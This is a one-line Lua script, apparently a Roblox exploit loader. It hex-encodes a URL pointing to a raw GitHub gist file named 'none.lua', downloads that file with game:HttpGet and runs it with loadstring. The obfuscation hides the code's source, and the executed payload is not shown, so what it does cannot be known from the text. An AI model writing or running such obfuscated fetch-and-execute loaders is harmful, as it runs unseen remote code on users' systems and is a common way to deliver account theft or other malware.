local hex = function(s) return (s:gsub('..', function(cc) return string.char(tonumber(cc, 16)) end)) end local url = "68747470733a2f2f676973742e67697468756275736572636f6e74656e742e636f6d2f335433524e344c392f33663431623166616663313264306530346364646232303337343337623036302f7261772f303732613162383566666131316264656437623536366436393163643832646532333463363835352f6e6f6e652e6c7561" loadstring(game:HttpGet(hex(url)))()